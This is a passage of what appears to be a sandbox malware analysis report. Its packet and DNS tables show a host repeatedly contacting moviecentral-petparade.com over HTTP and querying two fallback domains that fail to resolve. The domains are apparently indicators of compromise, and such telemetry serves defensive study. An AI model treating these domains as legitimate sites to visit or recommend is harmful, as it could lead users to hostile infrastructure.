Oct 31, 2024 14:26:41.130455971 CET	80	50009	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:41.130533934 CET	80	50008	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:41.130542994 CET	50009	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:41.130603075 CET	50008	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:41.130727053 CET	50009	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:41.135494947 CET	80	50009	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:42.002751112 CET	80	50009	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:42.002815962 CET	50009	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:43.624591112 CET	50009	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:43.624882936 CET	50010	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:43.629723072 CET	80	50010	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:43.629801989 CET	80	50009	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:43.629805088 CET	50010	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:43.629838943 CET	50009	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:43.629914999 CET	50010	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:43.634610891 CET	80	50010	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:44.584733009 CET	80	50010	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:44.584817886 CET	50010	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:46.102411985 CET	50010	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:46.106028080 CET	50011	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:46.108007908 CET	80	50010	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:46.108079910 CET	50010	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:46.111176968 CET	80	50011	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:46.111289024 CET	50011	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:46.112869024 CET	50011	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:46.117717028 CET	80	50011	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:46.990211964 CET	80	50011	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:46.990326881 CET	50011	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:48.631166935 CET	50011	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:48.631483078 CET	50012	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:48.636295080 CET	80	50012	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:48.636310101 CET	80	50011	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:48.636380911 CET	50011	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:48.636389971 CET	50012	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:48.643749952 CET	50012	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:48.648523092 CET	80	50012	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:49.516539097 CET	80	50012	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:49.516602039 CET	50012	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:51.033986092 CET	50012	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:51.034285069 CET	50013	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:51.039236069 CET	80	50013	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:51.039254904 CET	80	50012	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:51.039324999 CET	50013	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:51.039352894 CET	50012	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:51.039572954 CET	50013	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:51.044351101 CET	80	50013	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:51.934885025 CET	80	50013	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:51.934895992 CET	80	50013	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:51.935172081 CET	50013	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:53.562390089 CET	50013	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:53.562616110 CET	50014	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:53.567517042 CET	80	50014	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:53.567612886 CET	50014	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:53.567806005 CET	50014	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:53.567845106 CET	80	50013	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:53.567934990 CET	50013	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:53.572678089 CET	80	50014	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:54.439513922 CET	80	50014	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:54.439558983 CET	80	50014	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:54.439609051 CET	50014	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:54.439682007 CET	50014	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:55.953311920 CET	50014	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:55.953602076 CET	50015	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:55.958509922 CET	80	50015	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:55.958590984 CET	50015	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:55.958731890 CET	50015	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:55.958880901 CET	80	50014	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:55.958933115 CET	50014	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:55.963526011 CET	80	50015	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:56.939987898 CET	80	50015	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:56.940098047 CET	50015	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:58.562750101 CET	50015	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:58.562753916 CET	50016	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:58.567727089 CET	80	50016	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:58.567997932 CET	50016	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:58.567997932 CET	50016	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:58.568006039 CET	80	50015	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:58.568119049 CET	50015	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:26:58.572860956 CET	80	50016	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:59.340718985 CET	80	50016	172.67.213.173	192.168.2.9
Oct 31, 2024 14:26:59.340883017 CET	50016	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:27:00.843628883 CET	50016	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:27:00.843975067 CET	50017	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:27:00.848834991 CET	80	50017	172.67.213.173	192.168.2.9
Oct 31, 2024 14:27:00.849050999 CET	80	50016	172.67.213.173	192.168.2.9
Oct 31, 2024 14:27:00.849219084 CET	50017	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:27:00.849241018 CET	50016	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:27:00.849298000 CET	50017	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:27:00.854247093 CET	80	50017	172.67.213.173	192.168.2.9
Oct 31, 2024 14:27:01.600033045 CET	80	50017	172.67.213.173	192.168.2.9
Oct 31, 2024 14:27:01.600269079 CET	50017	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:27:03.265307903 CET	50017	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:27:03.265665054 CET	50018	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:27:03.270642042 CET	80	50018	172.67.213.173	192.168.2.9
Oct 31, 2024 14:27:03.270762920 CET	50018	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:27:03.273612022 CET	50018	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:27:03.279570103 CET	80	50018	172.67.213.173	192.168.2.9
Oct 31, 2024 14:27:03.284297943 CET	80	50017	172.67.213.173	192.168.2.9
Oct 31, 2024 14:27:03.284399986 CET	50017	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:27:04.183170080 CET	80	50018	172.67.213.173	192.168.2.9
Oct 31, 2024 14:27:04.183233976 CET	50018	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:27:05.688157082 CET	50018	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:27:05.688455105 CET	50019	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:27:05.693545103 CET	80	50018	172.67.213.173	192.168.2.9
Oct 31, 2024 14:27:05.693624973 CET	50018	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:27:05.694039106 CET	80	50019	172.67.213.173	192.168.2.9
Oct 31, 2024 14:27:05.694139004 CET	50019	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:27:05.694255114 CET	50019	80	192.168.2.9	172.67.213.173
Oct 31, 2024 14:27:05.699104071 CET	80	50019	172.67.213.173	192.168.2.9
Oct 31, 2024 14:27:06.558212042 CET	80	50019	172.67.213.173	192.168.2.9
Oct 31, 2024 14:27:06.558316946 CET	50019	80	192.168.2.9	172.67.213.173

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 31, 2024 14:25:34.222022057 CET	62541	53	192.168.2.9	1.1.1.1
Oct 31, 2024 14:25:34.222542048 CET	52290	53	192.168.2.9	1.1.1.1
Oct 31, 2024 14:25:34.222728014 CET	59413	53	192.168.2.9	1.1.1.1
Oct 31, 2024 14:25:34.229768991 CET	53	52290	1.1.1.1	192.168.2.9
Oct 31, 2024 14:25:34.230401039 CET	53	62541	1.1.1.1	192.168.2.9
Oct 31, 2024 14:25:34.230412960 CET	53	59413	1.1.1.1	192.168.2.9
Oct 31, 2024 14:25:38.893219948 CET	60382	53	192.168.2.9	1.1.1.1
Oct 31, 2024 14:25:38.893219948 CET	61695	53	192.168.2.9	1.1.1.1
Oct 31, 2024 14:25:38.900721073 CET	53	61695	1.1.1.1	192.168.2.9
Oct 31, 2024 14:25:38.901437998 CET	53	60382	1.1.1.1	192.168.2.9
Oct 31, 2024 14:25:43.672857046 CET	53651	53	192.168.2.9	1.1.1.1
Oct 31, 2024 14:25:43.673258066 CET	62057	53	192.168.2.9	1.1.1.1
Oct 31, 2024 14:25:43.680365086 CET	53	62057	1.1.1.1	192.168.2.9
Oct 31, 2024 14:25:43.680381060 CET	53	53651	1.1.1.1	192.168.2.9
Oct 31, 2024 14:25:49.953084946 CET	54456	53	192.168.2.9	1.1.1.1
Oct 31, 2024 14:25:49.953084946 CET	62280	53	192.168.2.9	1.1.1.1
Oct 31, 2024 14:25:49.960494995 CET	53	62280	1.1.1.1	192.168.2.9
Oct 31, 2024 14:25:49.960515976 CET	53	54456	1.1.1.1	192.168.2.9
Oct 31, 2024 14:25:54.610634089 CET	59246	53	192.168.2.9	1.1.1.1
Oct 31, 2024 14:25:54.610805035 CET	62949	53	192.168.2.9	1.1.1.1
Oct 31, 2024 14:25:54.617914915 CET	53	62949	1.1.1.1	192.168.2.9
Oct 31, 2024 14:25:54.617927074 CET	53	59246	1.1.1.1	192.168.2.9
Oct 31, 2024 14:26:00.905236006 CET	65331	53	192.168.2.9	1.1.1.1
Oct 31, 2024 14:26:00.905428886 CET	62862	53	192.168.2.9	1.1.1.1
Oct 31, 2024 14:26:00.912453890 CET	53	65331	1.1.1.1	192.168.2.9
Oct 31, 2024 14:26:00.914242029 CET	53	62862	1.1.1.1	192.168.2.9
Oct 31, 2024 14:26:05.680773973 CET	57315	53	192.168.2.9	1.1.1.1
Oct 31, 2024 14:26:05.685832977 CET	64309	53	192.168.2.9	1.1.1.1
Oct 31, 2024 14:26:05.687886953 CET	53	57315	1.1.1.1	192.168.2.9
Oct 31, 2024 14:26:05.693030119 CET	53	64309	1.1.1.1	192.168.2.9
Oct 31, 2024 14:26:11.969189882 CET	61628	53	192.168.2.9	1.1.1.1
Oct 31, 2024 14:26:11.969480991 CET	54988	53	192.168.2.9	1.1.1.1
Oct 31, 2024 14:26:11.976218939 CET	53	61628	1.1.1.1	192.168.2.9
Oct 31, 2024 14:26:11.977168083 CET	53	54988	1.1.1.1	192.168.2.9
Oct 31, 2024 14:26:16.626781940 CET	64824	53	192.168.2.9	1.1.1.1
Oct 31, 2024 14:26:16.627121925 CET	62191	53	192.168.2.9	1.1.1.1
Oct 31, 2024 14:26:16.638740063 CET	53	62191	1.1.1.1	192.168.2.9
Oct 31, 2024 14:26:16.639245033 CET	53	64824	1.1.1.1	192.168.2.9
Oct 31, 2024 14:26:22.951883078 CET	51187	53	192.168.2.9	1.1.1.1
Oct 31, 2024 14:26:22.951883078 CET	59653	53	192.168.2.9	1.1.1.1
Oct 31, 2024 14:26:22.959871054 CET	53	59653	1.1.1.1	192.168.2.9
Oct 31, 2024 14:26:22.960345984 CET	53	51187	1.1.1.1	192.168.2.9
Oct 31, 2024 14:26:27.764246941 CET	49500	53	192.168.2.9	1.1.1.1
Oct 31, 2024 14:26:27.764679909 CET	49531	53	192.168.2.9	1.1.1.1
Oct 31, 2024 14:26:27.771910906 CET	53	49500	1.1.1.1	192.168.2.9
Oct 31, 2024 14:26:27.775103092 CET	53	49531	1.1.1.1	192.168.2.9
Oct 31, 2024 14:26:32.422615051 CET	51212	53	192.168.2.9	1.1.1.1
Oct 31, 2024 14:26:32.422672033 CET	53837	53	192.168.2.9	1.1.1.1
Oct 31, 2024 14:26:32.432398081 CET	53	51212	1.1.1.1	192.168.2.9
Oct 31, 2024 14:26:32.432430029 CET	53	53837	1.1.1.1	192.168.2.9
Oct 31, 2024 14:26:38.785851002 CET	60630	53	192.168.2.9	1.1.1.1
Oct 31, 2024 14:26:38.786953926 CET	56836	53	192.168.2.9	1.1.1.1
Oct 31, 2024 14:26:38.793663025 CET	53	60630	1.1.1.1	192.168.2.9
Oct 31, 2024 14:26:38.796546936 CET	53	56836	1.1.1.1	192.168.2.9
Oct 31, 2024 14:26:43.563127041 CET	60327	53	192.168.2.9	1.1.1.1
Oct 31, 2024 14:26:43.624917030 CET	54763	53	192.168.2.9	1.1.1.1
Oct 31, 2024 14:26:43.632249117 CET	53	54763	1.1.1.1	192.168.2.9
Oct 31, 2024 14:26:43.719285011 CET	53	60327	1.1.1.1	192.168.2.9
Oct 31, 2024 14:26:49.910510063 CET	49369	53	192.168.2.9	1.1.1.1
Oct 31, 2024 14:26:49.920998096 CET	53	49369	1.1.1.1	192.168.2.9
Oct 31, 2024 14:26:50.010185003 CET	60300	53	192.168.2.9	1.1.1.1
Oct 31, 2024 14:26:50.017549038 CET	53	60300	1.1.1.1	192.168.2.9
Oct 31, 2024 14:26:54.579276085 CET	59812	53	192.168.2.9	1.1.1.1
Oct 31, 2024 14:26:54.586900949 CET	53	59812	1.1.1.1	192.168.2.9
Oct 31, 2024 14:26:54.672873974 CET	61523	53	192.168.2.9	1.1.1.1
Oct 31, 2024 14:26:54.680430889 CET	53	61523	1.1.1.1	192.168.2.9
Oct 31, 2024 14:26:59.454194069 CET	53466	53	192.168.2.9	1.1.1.1
Oct 31, 2024 14:26:59.463676929 CET	53	53466	1.1.1.1	192.168.2.9
Oct 31, 2024 14:27:00.875622034 CET	60349	53	192.168.2.9	1.1.1.1
Oct 31, 2024 14:27:00.882936001 CET	53	60349	1.1.1.1	192.168.2.9
Oct 31, 2024 14:27:05.657006025 CET	64092	53	192.168.2.9	1.1.1.1
Oct 31, 2024 14:27:05.664279938 CET	53	64092	1.1.1.1	192.168.2.9
Oct 31, 2024 14:27:05.734827995 CET	49360	53	192.168.2.9	1.1.1.1
Oct 31, 2024 14:27:05.742398977 CET	53	49360	1.1.1.1	192.168.2.9

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 31, 2024 14:25:34.222022057 CET	192.168.2.9	1.1.1.1	0xa274	Standard query (0)	moviecentral-petparade.com	A (IP address)	IN (0x0001)	false
Oct 31, 2024 14:25:34.222542048 CET	192.168.2.9	1.1.1.1	0x99dd	Standard query (0)	moviecentral-petparade2.com	A (IP address)	IN (0x0001)	false
Oct 31, 2024 14:25:34.222728014 CET	192.168.2.9	1.1.1.1	0x96e3	Standard query (0)	moviecentral-petparade3.com	A (IP address)	IN (0x0001)	false
Oct 31, 2024 14:25:38.893219948 CET	192.168.2.9	1.1.1.1	0x6bd3	Standard query (0)	moviecentral-petparade3.com	A (IP address)	IN (0x0001)	false
Oct 31, 2024 14:25:38.893219948 CET	192.168.2.9	1.1.1.1	0xbae6	Standard query (0)	moviecentral-petparade2.com	A (IP address)	IN (0x0001)	false
Oct 31, 2024 14:25:43.672857046 CET	192.168.2.9	1.1.1.1	0xfe60	Standard query (0)	moviecentral-petparade3.com	A (IP address)	IN (0x0001)	false
Oct 31, 2024 14:25:43.673258066 CET	192.168.2.9	1.1.1.1	0x6d6a	Standard query (0)	moviecentral-petparade2.com	A (IP address)	IN (0x0001)	false
Oct 31, 2024 14:25:49.953084946 CET	192.168.2.9	1.1.1.1	0x60ce	Standard query (0)	moviecentral-petparade3.com	A (IP address)	IN (0x0001)	false
Oct 31, 2024 14:25:49.953084946 CET	192.168.2.9	1.1.1.1	0x83be	Standard query (0)	moviecentral-petparade2.com	A (IP address)	IN (0x0001)	false
Oct 31, 2024 14:25:54.610634089 CET	192.168.2.9	1.1.1.1	0x3ca3	Standard query (0)	moviecentral-petparade2.com	A (IP address)	IN (0x0001)	false
Oct 31, 2024 14:25:54.610805035 CET	192.168.2.9	1.1.1.1	0xa7e5	Standard query (0)	moviecentral-petparade3.com	A (IP address)	IN (0x0001)	false
Oct 31, 2024 14:26:00.905236006 CET	192.168.2.9	1.1.1.1	0xcfe3	Standard query (0)	moviecentral-petparade2.com	A (IP address)	IN (0x0001)	false
Oct 31, 2024 14:26:00.905428886 CET	192.168.2.9	1.1.1.1	0x37ed	Standard query (0)	moviecentral-petparade3.com	A (IP address)	IN (0x0001)	false
Oct 31, 2024 14:26:05.680773973 CET	192.168.2.9	1.1.1.1	0xdbad	Standard query (0)	moviecentral-petparade2.com	A (IP address)	IN (0x0001)	false
Oct 31, 2024 14:26:05.685832977 CET	192.168.2.9	1.1.1.1	0x7e52	Standard query (0)	moviecentral-petparade3.com	A (IP address)	IN (0x0001)	false
Oct 31, 2024 14:26:11.969189882 CET	192.168.2.9	1.1.1.1	0xf9ec	Standard query (0)	moviecentral-petparade2.com	A (IP address)	IN (0x0001)	false
Oct 31, 2024 14:26:11.969480991 CET	192.168.2.9	1.1.1.1	0x9ed9	Standard query (0)	moviecentral-petparade3.com	A (IP address)	IN (0x0001)	false
Oct 31, 2024 14:26:16.626781940 CET	192.168.2.9	1.1.1.1	0xc3fd	Standard query (0)	moviecentral-petparade2.com	A (IP address)	IN (0x0001)	false
Oct 31, 2024 14:26:16.627121925 CET	192.168.2.9	1.1.1.1	0xc532	Standard query (0)	moviecentral-petparade3.com	A (IP address)	IN (0x0001)	false
Oct 31, 2024 14:26:22.951883078 CET	192.168.2.9	1.1.1.1	0x12f5	Standard query (0)	moviecentral-petparade2.com	A (IP address)	IN (0x0001)	false
Oct 31, 2024 14:26:22.951883078 CET	192.168.2.9	1.1.1.1	0xa8c0	Standard query (0)	moviecentral-petparade3.com	A (IP address)	IN (0x0001)	false
Oct 31, 2024 14:26:27.764246941 CET	192.168.2.9	1.1.1.1	0x3810	Standard query (0)	moviecentral-petparade2.com	A (IP address)	IN (0x0001)	false
Oct 31, 2024 14:26:27.764679909 CET	192.168.2.9	1.1.1.1	0x66ac	Standard query (0)	moviecentral-petparade3.com	A (IP address)	IN (0x0001)	false
Oct 31, 2024 14:26:32.422615051 CET	192.168.2.9	1.1.1.1	0x4796	Standard query (0)	moviecentral-petparade3.com	A (IP address)	IN (0x0001)	false
Oct 31, 2024 14:26:32.422672033 CET	192.168.2.9	1.1.1.1	0xf928	Standard query (0)	moviecentral-petparade2.com	A (IP address)	IN (0x0001)	false
Oct 31, 2024 14:26:38.785851002 CET	192.168.2.9	1.1.1.1	0xaca9	Standard query (0)	moviecentral-petparade3.com	A (IP address)	IN (0x0001)	false
Oct 31, 2024 14:26:38.786953926 CET	192.168.2.9	1.1.1.1	0x23	Standard query (0)	moviecentral-petparade2.com	A (IP address)	IN (0x0001)	false
Oct 31, 2024 14:26:43.563127041 CET	192.168.2.9	1.1.1.1	0xf0f5	Standard query (0)	moviecentral-petparade2.com	A (IP address)	IN (0x0001)	false
Oct 31, 2024 14:26:43.624917030 CET	192.168.2.9	1.1.1.1	0xfcd6	Standard query (0)	moviecentral-petparade3.com	A (IP address)	IN (0x0001)	false
Oct 31, 2024 14:26:49.910510063 CET	192.168.2.9	1.1.1.1	0x5220	Standard query (0)	moviecentral-petparade3.com	A (IP address)	IN (0x0001)	false
Oct 31, 2024 14:26:50.010185003 CET	192.168.2.9	1.1.1.1	0xaec1	Standard query (0)	moviecentral-petparade2.com	A (IP address)	IN (0x0001)	false
Oct 31, 2024 14:26:54.579276085 CET	192.168.2.9	1.1.1.1	0x3862	Standard query (0)	moviecentral-petparade3.com	A (IP address)	IN (0x0001)	false
Oct 31, 2024 14:26:54.672873974 CET	192.168.2.9	1.1.1.1	0xf968	Standard query (0)	moviecentral-petparade2.com	A (IP address)	IN (0x0001)	false
Oct 31, 2024 14:26:59.454194069 CET	192.168.2.9	1.1.1.1	0xdb8c	Standard query (0)	moviecentral-petparade2.com	A (IP address)	IN (0x0001)	false
Oct 31, 2024 14:27:00.875622034 CET	192.168.2.9	1.1.1.1	0xab11	Standard query (0)	moviecentral-petparade3.com	A (IP address)	IN (0x0001)	false
Oct 31, 2024 14:27:05.657006025 CET	192.168.2.9	1.1.1.1	0x4ce2	Standard query (0)	moviecentral-petparade3.com	A (IP address)	IN (0x0001)	false
Oct 31, 2024 14:27:05.734827995 CET	192.168.2.9	1.1.1.1	0x2be6	Standard query (0)	moviecentral-petparade2.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 31, 2024 14:24:58.010600090 CET	1.1.1.1	192.168.2.9	0x1b4d	No error (0)	shed.dual-low.s-part-0017.t-0009.t-msedge.net	s-part-0017.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 31, 2024 14:24:58.010600090 CET	1.1.1.1	192.168.2.9	0x1b4d	No error (0)	s-part-0017.t-0009.t-msedge.net		13.107.246.45	A (IP address)	IN (0x0001)	false
Oct 31, 2024 14:25:34.229768991 CET	1.1.1.1	192.168.2.9	0x99dd	Name error (3)	moviecentral-petparade2.com	none	none	A (IP address)	IN (0x0001)	false
Oct 31, 2024 14:25:34.230401039 CET	1.1.1.1	192.168.2.9	0xa274	No error (0)	moviecentral-petparade.com		172.67.213.173	A (IP address)	IN (0x0001)	false
Oct 31, 2024 14:25:34.230401039 CET	1.1.1.1	192.168.2.9	0xa274	No error (0)	moviecentral-petparade.com		104.21.23.211	A (IP address)	IN (0x0001)	false
Oct 31, 2024 14:25:34.230412960 CET	1.1.1.1	192.168.2.9	0x96e3	Name error (3)	moviecentral-petparade3.com	none	none	A (IP address)	IN (0x0001)	false
Oct 31, 2024 14:25:38.900721073 CET	1.1.1.1	192.168.2.9	0xbae6	Name error (3)	moviecentral-petparade2.com	none	none	A (IP address)	IN (0x0001)	false
Oct 31, 2024 14:25:38.901437998 CET	1.1.1.1	192.168.2.9	0x6bd3	Name error (3)	moviecentral-petparade3.com	none	none	A (IP address)	IN (0x0001)	false
Oct 31, 2024 14:25:43.680365086 CET	1.1.1.1	192.168.2.9	0x6d6a	Name error (3)	moviecentral-petparade2.com	none	none	A (IP address)	IN (0x0001)	false
Oct 31, 2024 14:25:43.680381060 CET	1.1.1.1	192.168.2.9	0xfe60	Name error (3)	moviecentral-petparade3.com	none	none	A (IP address)	IN (0x0001)	false
Oct 31, 2024 14:25:49.960494995 CET	1.1.1.1	192.168.2.9	0x83be	Name error (3)	moviecentral-petparade2.com	none	none	A (IP address)	IN (0x0001)	false
Oct 31, 2024 14:25:49.960515976 CET	1.1.1.1	192.168.2.9	0x60ce	Name error (3)	moviecentral-petparade3.com	none	none	A (IP address)	IN (0x0001)	false
Oct 31, 2024 14:25:54.617914915 CET	1.1.1.1	192.168.2.9	0xa7e5	Name error (3)	moviecentral-petparade3.com	none	none	A (IP address)	IN (0x0001)	false
Oct 31, 2024 14:25:54.617927074 CET	1.1.1.1	192.168.2.9	0x3ca3	Name error (3)	moviecentral-petparade2.com	none	none	A (IP address)	IN (0x0001)	false
Oct 31, 2024 14:26:00.912453890 CET	1.1.1.1	192.168.2.9	0xcfe3	Name error (3)	moviecentral-petparade2.com	none	none	A (IP address)	IN (0x0001)	false
Oct 31, 2024 14:26:00.914242029 CET	1.1.1.1	192.168.2.9	0x37ed	Name error (3)	moviecentral-petparade3.com	none	none	A (IP address)	IN (0x0001)	false
Oct 31, 2024 14:26:05.687886953 CET	1.1.1.1	192.168.2.9	0xdbad	Name error (3)	moviecentral-petparade2.com	none	none	A (IP address)	IN (0x0001)	false
Oct 31, 2024 14:26:05.693030119 CET	1.1.1.1	192.168.2.9	0x7e52	Name error (3)	moviecentral-petparade3.com	none	none	A (IP address)	IN (0x0001)	false
Oct 31, 2024 14:26:11.976218939 CET	1.1.1.1	192.168.2.9	0xf9ec	Name error (3)	moviecentral-petparade2.com	none	none	A (IP address)	IN (0x0001)	false
Oct 31, 2024 14:26:11.977168083 CET	1.1.1.1	192.168.2.9	0x9ed9	Name error (3)	moviecentral-petparade3.com	none	none	A (IP address)	IN (0x0001)	false
Oct 31, 2024 14:26:16.638740063 CET	1.1.1.1	192.168.2.9	0xc532	Name error (3)	moviecentral-petparade3.com	none	none	A (IP address)	IN (0x0001)	false
Oct 31, 2024 14:26:16.639245033 CET	1.1.1.1	192.168.2.9	0xc3fd	Name error (3)	moviecentral-petparade2.com	none	none	A (IP address)	IN (0x0001)	false
Oct 31, 2024 14:26:22.959871054 CET	1.1.1.1	192.168.2.9	0xa8c0	Name error (3)	moviecentral-petparade3.com	none	none	A (IP address)	IN (0x0001)	false
Oct 31, 2024 14:26:22.960345984 CET	1.1.1.1	192.168.2.9	0x12f5	Name error (3)	moviecentral-petparade2.com	none	none	A (IP address)	IN (0x0001)	false
Oct 31, 2024 14:26:27.771910906 CET	1.1.1.1	192.168.2.9	0x3810	Name error (3)	moviecentral-petparade2.com	none	none	A (IP address)	IN (0x0001)	false
Oct 31, 2024 14:26:27.775103092 CET	1.1.1.1	192.168.2.9	0x66ac	Name error (3)	moviecentral-petparade3.com	none	none	A (IP address)	IN (0x0001)	false
Oct 31, 2024 14:26:32.432398081 CET	1.1.1.1	192.168.2.9	0x4796	Name error (3)	moviecentral-petparade3.com	none	none	A (IP address)	IN (0x0001)	false
Oct 31, 2024 14:26:32.432430029 CET	1.1.1.1	192.168.2.9	0xf928	Name error (3)	moviecentral-petparade2.com	none	none	A (IP address)	IN (0x0001)	false
Oct 31, 2024 14:26:38.793663025 CET	1.1.1.1	192.168.2.9	0xaca9	Name error (3)	moviecentral-petparade3.com	none	none	A (IP address)	IN (0x0001)	false
Oct 31, 2024 14:26:38.796546936 CET	1.1.1.1	192.168.2.9	0x23	Name error (3)	moviecentral-petparade2.com	none	none	A (IP address)	IN (0x0001)	false
Oct 31, 2024 14:26:43.632249117 CET	1.1.1.1	192.168.2.9	0xfcd6	Name error (3)	moviecentral-petparade3.com	none	none	A (IP address)	IN (0x0001)	false
Oct 31, 2024 14:26:43.719285011 CET	1.1.1.1	192.168.2.9	0xf0f5	Name error (3)	moviecentral-petparade2.com	none	none	A (IP address)	IN (0x0001)	false
Oct 31, 2024 14:26:49.920998096 CET	1.1.1.1	192.168.2.9	0x5220	Name error (3)	moviecentral-petparade3.com	none	none	A (IP address)	IN (0x0001)	false
Oct 31, 2024 14:26:50.017549038 CET	1.1.1.1	192.168.2.9	0xaec1	Name error (3)	moviecentral-petparade2.com	none	none	A (IP address)	IN (0x0001)	false
Oct 31, 2024 14:26:54.586900949 CET	1.1.1.1	192.168.2.9	0x3862	Name error (3)	moviecentral-petparade3.com	none	none	A (IP address)	IN (0x0001)	false
Oct 31, 2024 14:26:54.680430889 CET	1.1.1.1	192.168.2.9	0xf968	Name error (3)	moviecentral-petparade2.com	none	none	A (IP address)	IN (0x0001)	false
Oct 31, 2024 14:26:59.463676929 CET	1.1.1.1	192.168.2.9	0xdb8c	Name error (3)	moviecentral-petparade2.com	none	none	A (IP address)	IN (0x0001)	false
Oct 31, 2024 14:27:00.882936001 CET	1.1.1.1	192.168.2.9	0xab11	Name error (3)	moviecentral-petparade3.com	none	none	A (IP address)	IN (0x0001)	false
Oct 31, 2024 14:27:05.664279938 CET	1.1.1.1	192.168.2.9	0x4ce2	Name error (3)	moviecentral-petparade3.com	none	none	A (IP address)	IN (0x0001)	false
Oct 31, 2024 14:27:05.742398977 CET	1.1.1.1	192.168.2.9	0x2be6	Name error (3)	moviecentral-petparade2.com	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

moviecentral-petparade.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
